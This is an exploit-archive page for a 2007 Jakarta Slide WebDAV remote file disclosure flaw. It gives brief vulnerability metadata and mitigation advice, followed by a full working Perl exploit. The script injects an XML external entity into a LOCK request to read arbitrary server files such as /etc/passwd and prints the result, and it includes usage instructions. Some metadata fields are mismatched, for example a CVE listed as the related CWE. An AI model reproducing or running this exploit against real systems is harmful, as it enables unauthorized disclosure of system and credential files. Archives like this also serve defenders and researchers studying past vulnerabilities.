header-logo
Suggest Exploit
vendor:
Jakarta Slide
by:
eliteb0y
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: Jakarta Slide
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-2450
CPE: a:apache:jakarta_slide
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0876/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2007-2450/https://www.rapid7.com/db/vulnerabilities/apple-osx-tomcat-cve-2007-2450/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0569/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0569/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-2450/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0261/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0524/
Other Scripts:
Platforms Tested:
2007

Jakarta Slide Remote File Disclosure Zeroday Xploit

This exploit allows an attacker to remotely disclose files on a system using the Jakarta Slide WebDav implementation. The vulnerability is triggered by sending a specially crafted LOCK request to the target host. The exploit requires authentication to work.

Mitigation:

To mitigate this vulnerability, users should update to the latest version of Jakarta Slide or switch to a different WebDav implementation. Additionally, ensuring that proper authentication is required for WebDav access can help prevent unauthorized access.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#******************************************************
# Jakarta Slide Remote File Disclosure Zeroday Xploit
# eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
	print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
	print "eliteb0y / 2007\n";
	print "usage: perl JAKARTAXPL <remotehost> <slide file> <file to retrieve> [username] [password]\n";
	print "example: perl JAKARTAXPL www.hostname.com /slide/users/guest /etc/passwd guest guest\n";exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => $remoteport,
                              Proto    => 'tcp');
                              
$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL = 
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";

print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
print "eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";

$ExploitRequest =
 "LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth";	
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
	print;
}

# milw0rm.com [2007-10-24]

Navigation

Suggest Exploit

Services By CQR